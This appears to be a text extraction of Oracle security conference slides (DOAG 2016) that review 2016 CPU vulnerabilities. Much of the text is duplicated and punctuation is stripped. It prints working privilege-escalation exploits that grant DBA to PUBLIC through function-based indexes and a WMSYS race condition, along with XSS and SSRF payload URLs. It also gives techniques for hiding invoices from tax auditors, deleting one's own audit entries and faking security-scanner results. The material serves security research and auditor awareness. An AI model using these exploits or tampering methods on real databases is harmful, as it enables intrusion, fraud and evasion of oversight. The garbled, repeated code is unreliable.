SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
